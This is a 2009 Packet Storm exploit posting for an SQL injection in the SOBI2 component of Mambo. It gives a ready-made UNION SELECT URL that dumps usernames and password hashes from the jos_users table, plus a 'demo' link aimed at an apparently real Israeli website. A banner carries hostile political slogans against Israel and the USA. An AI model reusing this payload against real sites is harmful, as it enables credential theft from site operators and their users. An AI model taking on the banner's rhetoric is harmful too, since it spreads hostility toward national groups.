Mambo SOBI2 SQL Injection

2009-01-21T00:00:00
ID PACKETSTORM:74184
Type packetstorm
Reporter Br1ght D@rk
Modified 2009-01-21T00:00:00

Description

                                        
                                            `   
|| || | ||   
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,   
( : / (_) / ( .   
  
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+  
| |  
| GaZa WiLL NeVeR DiE |  
| |  
| GoTo H3LL { Israel & Usa } |  
| |  
| Proud To Be A MusLiM , Proud To Be A EgYpTiaN |  
| |  
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+  
  
  
<<!>> Found by : Br1ght D@rk  
  
<<!>> C0ntact : MiDo2005_2010 [at] hotmail.com   
  
<<!>> Groups : EgY C0D3RS TeaM , SeCuRiTy G33KS   
  
=======================================================  
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++  
=======================================================  
  
  
<<->> D0rk : find it  
  
<<->> Exploit :>>>   
  
:>>> http://www.site.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+0,concat(username,0x3a3a,password),0+from+jos_users--  
  
<<->> DeM00 :>>> http://www.karmel.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+1,concat(username,0x3a3a,password),3+from+jos_users--   
  
=======================================================  
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++  
=======================================================  
  
<<->> All freinds , all muslims , Egy C0ders , AsbMay Group,sec-geeks.com   
  
<--[ sec-geeks.com ]-->  
  
  
`